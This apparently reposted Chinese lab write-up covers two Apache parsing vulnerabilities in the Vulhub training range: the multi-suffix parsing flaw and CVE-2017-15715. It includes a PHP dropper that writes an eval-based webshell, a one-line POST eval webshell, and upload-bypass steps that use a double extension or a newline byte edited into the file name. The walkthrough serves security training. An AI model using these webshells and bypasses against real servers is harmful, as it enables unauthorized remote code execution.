当前位置: 首页 > article >正文

Vulhub靶场Apache解析漏洞

一.apache_parsing

原理:Apache HTTPD ⽀持⼀个⽂件拥有多个后缀,并为不同后缀执⾏不同的指令。在Apache1.x/2.x中Apache 解析⽂件的规则是从右到左开始判断解析,如果后缀名为不可识别⽂件解析,就再往左判断。如 1.php.xxxxx

打开靶场

创建一个名为1.php.jpg的文件,内容输入

<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"]);?>')?>

上传。。。

他会生成一个内容是<?php eval($_POST["cmd"]);?>名为shell.php的文件

我们拼接网址访问

测试是否上传成功

二.CVE-2017-15715

原理:Apache HTTPD是⼀款HTTP服务器,它可以通过mod_php来运⾏PHP⽹⻚。其2.4.0~2.4.29版本中存在⼀个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进⾏解析,导致绕过⼀些服务器的安全策略。

影响版本:2.4.0~2.4.29

进入靶场

创建一个内容为<?php @eval($_POST['a']); ?>名为1.jpg的文件

上传,抓包

在evil.php⽂件后⾯添加空格

在到HEX中找到evil.php的那一行,把20改成0a

放行,访问evil.php%0a

写入成功!!!


http://www.kler.cn/a/450842.html

相关文章:

  • 蓝牙协议——音量控制
  • 从AI换脸到篡改图像,合合信息如何提升视觉内容安全?
  • 图像处理-Ch6-彩色图像处理
  • HTML基础学习(2)
  • 链接数据Linked Data的深层解读
  • 重温设计模式--职责链模式
  • 芯科科技蓝牙、Wi-Fi、Wi-SUN产品广获业界认可,技术创新引领行业潮流
  • 首批|云轴科技ZStack成为开放智算产业联盟首批会员单位
  • 操作系统(23)外存的存储空间的管理
  • 用Python开启人工智能之旅(三)常用的机器学习算法与实现
  • 网络安全攻防演练中的常见计策
  • 青藤入选工信部“2024年网络安全技术应用典型案例拟支持项目名单”
  • 数据冷热分离详解
  • MySql---进阶篇(1)---存储引擎的介绍与选择
  • html固定头和第一列简单例子
  • MySQL purged gtid是如何生成和维护的
  • Websocket客户端从Openai Realtime api Sever只收到部分数据问题分析
  • [OpenGL]使用TransformFeedback实现粒子效果
  • web-view在指定区域打开,不自动全屏
  • 天水月亮圈圈:舌尖上的历史与传承
  • 深度学习中,用损失的均值或者总和反向传播的区别
  • C# Main方法 和顶级语句详解
  • 【全网首发】台湾省模型数据“去水印“说明(3Dtiles和osgb格式),全台湾省的模型数据,全域无水印AI处理,支持所有模型格式
  • Android Framework 中的 AV/Camera 技术架构详解
  • Web 代理、爬行器和爬虫
  • #渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍09基于布尔值的SQL注入(Boolean-Based SQL Injection)